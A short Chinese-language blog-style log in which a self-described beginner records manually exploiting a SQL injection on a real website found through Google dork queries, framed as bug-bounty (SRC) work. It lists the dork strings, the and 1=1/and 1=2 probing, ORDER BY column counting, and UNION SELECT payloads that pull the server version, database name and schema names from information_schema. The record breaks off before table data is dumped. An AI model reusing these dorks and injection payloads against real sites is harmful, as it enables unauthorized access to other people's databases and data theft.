萌新记录一次src某网站的显错注入

前面挖了几次都是 and 1=1 and 1=2 报错的话就直接丢sqlmap跑 (其实是手动没做出来）
这次手动做，靶场的做法一样
通过谷歌语法找网站
地区+inurl:asp?id=50
地区+inurl:php?id=50
地区+inurl:”type_id=1
选中一个倒霉蛋开始
在id=2后面插入 and 1=1 and 1=2 发现报错

有注入，用显错注入
id=2 and 1=1 order by 13 一直到14不报错 那就是13 了

开始联合查询 id=1 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13

有回显是：4 9 12,在4的方查询PHP版本信息，在12的地方查库名

id=2 and 1=1 union select 1,2,3,version(),5,6,7,8,9,10,11,database(),13#cp

出来一个库名查询下其他库名
id=2 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,table_schema,13 from information_schema.tables#cp

选择51ganxi这个表来看下
这里使用limit 0,1 会报错不知道为啥

查出来表名
然后使用语句查询字段名和数据